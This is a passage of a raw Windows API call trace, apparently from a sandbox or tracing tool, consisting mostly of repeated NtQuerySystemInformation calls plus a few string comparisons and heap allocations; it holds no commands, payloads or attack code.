[0233.094] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeac0, Length=0x50, ResultLength=0x0) [0233.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffea40, Length=0x28, ResultLength=0x0) [0233.095] _wcsicmp (_String1="SPPSVC\\$$global$$", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0233.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeac0, Length=0x50, ResultLength=0x0) [0233.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeac0, Length=0x50, ResultLength=0x0) [0233.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeac0, Length=0x50, ResultLength=0x0) [0233.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.095] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe9f0, Length=0x38, ResultLength=0x0) [0233.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe820, Length=0x28, ResultLength=0x0) [0233.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe820, Length=0x28, ResultLength=0x0) [0233.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.096] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe820, Length=0x28, ResultLength=0x0) [0233.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe820, Length=0x28, ResultLength=0x0) [0233.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe890, Length=0x28, ResultLength=0x0) [0233.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe9f0, Length=0x38, ResultLength=0x0) [0233.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.097] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe910, Length=0x28, ResultLength=0x0) [0233.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe910, Length=0x28, ResultLength=0x0) [0233.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe9f0, Length=0x38, ResultLength=0x0) [0233.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe870, Length=0x20, ResultLength=0x0) [0233.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe7f0, Length=0x20, ResultLength=0x0) [0233.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe7f0, Length=0x20, ResultLength=0x0) [0233.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe7f0, Length=0x20, ResultLength=0x0) [0233.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe9f0, Length=0x38, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe870, Length=0x20, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe800, Length=0x20, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe800, Length=0x20, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeac0, Length=0x50, ResultLength=0x0) [0233.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffea40, Length=0x28, ResultLength=0x0) [0233.101] _wcsicmp (_String1="SPPSVC\\$$global$$", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0233.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeac0, Length=0x50, ResultLength=0x0) [0233.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeac0, Length=0x50, ResultLength=0x0) [0233.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeac0, Length=0x50, ResultLength=0x0) [0233.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe9f0, Length=0x38, ResultLength=0x0) [0233.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe820, Length=0x28, ResultLength=0x0) [0233.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe820, Length=0x28, ResultLength=0x0) [0233.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe820, Length=0x28, ResultLength=0x0) [0233.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe820, Length=0x28, ResultLength=0x0) [0233.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe890, Length=0x28, ResultLength=0x0) [0233.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe9f0, Length=0x38, ResultLength=0x0) [0233.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe910, Length=0x28, ResultLength=0x0) [0233.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe910, Length=0x28, ResultLength=0x0) [0233.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe9f0, Length=0x38, ResultLength=0x0) [0233.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe870, Length=0x20, ResultLength=0x0) [0233.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe7f0, Length=0x20, ResultLength=0x0) [0233.105] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe7f0, Length=0x20, ResultLength=0x0) [0233.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe7f0, Length=0x20, ResultLength=0x0) [0233.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe9f0, Length=0x38, ResultLength=0x0) [0233.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe870, Length=0x20, ResultLength=0x0) [0233.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe800, Length=0x20, ResultLength=0x0) [0233.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe800, Length=0x20, ResultLength=0x0) [0233.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.108] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffed60, Length=0x48, ResultLength=0x0) [0233.109] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffebe0, Length=0x40, ResultLength=0x0) [0233.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe890, Length=0x50, ResultLength=0x0) [0233.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe890, Length=0x50, ResultLength=0x0) [0233.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe890, Length=0x50, ResultLength=0x0) [0233.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe780, Length=0x50, ResultLength=0x0) [0233.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe780, Length=0x50, ResultLength=0x0) [0233.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe780, Length=0x50, ResultLength=0x0) [0233.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe780, Length=0x50, ResultLength=0x0) [0233.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.115] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe6b0, Length=0x38, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe4e0, Length=0x28, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe4e0, Length=0x28, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe4e0, Length=0x28, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe4e0, Length=0x28, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe550, Length=0x28, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe6b0, Length=0x38, ResultLength=0x0) [0233.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe5d0, Length=0x28, ResultLength=0x0) [0233.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe5d0, Length=0x28, ResultLength=0x0) [0233.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe470, Length=0x20, ResultLength=0x0) [0233.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3f0, Length=0x20, ResultLength=0x0) [0233.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3f0, Length=0x20, ResultLength=0x0) [0233.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3f0, Length=0x20, ResultLength=0x0) [0233.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.120] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe6b0, Length=0x38, ResultLength=0x0) [0233.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe6b0, Length=0x38, ResultLength=0x0) [0233.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe530, Length=0x20, ResultLength=0x0) [0233.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe4c0, Length=0x20, ResultLength=0x0) [0233.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe4c0, Length=0x20, ResultLength=0x0) [0233.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.123] GetProcessHeap () returned 0x269489b0000 [0233.123] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x230) returned 0x26949584db0 [0233.126] GetProcessHeap () returned 0x269489b0000 [0233.126] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x28) returned 0x269489eeb50 [0233.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeeb0, Length=0x50, ResultLength=0x0) [0233.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeeb0, Length=0x50, ResultLength=0x0) [0233.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeeb0, Length=0x50, ResultLength=0x0) [0233.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeda0, Length=0x50, ResultLength=0x0) [0233.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeda0, Length=0x50, ResultLength=0x0) [0233.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeda0, Length=0x50, ResultLength=0x0) [0233.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeda0, Length=0x50, ResultLength=0x0) [0233.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecd0, Length=0x38, ResultLength=0x0) [0233.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb00, Length=0x28, ResultLength=0x0) [0233.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb00, Length=0x28, ResultLength=0x0) [0233.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb00, Length=0x28, ResultLength=0x0) [0233.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb00, Length=0x28, ResultLength=0x0) [0233.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffeb70, Length=0x28, ResultLength=0x0) [0233.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffecd0, Length=0x38, ResultLength=0x0) [0233.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffebf0, Length=0x28, ResultLength=0x0) [0233.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffebf0, Length=0x28, ResultLength=0x0) [0233.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffea90, Length=0x20, ResultLength=0x0) [0233.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffea10, Length=0x20, ResultLength=0x0) [0233.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0233.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffea10, Length=0x20, ResultLength=0x0) [0233.167] NtQuerySystemInformation (SystemInformationClass=0xb9, 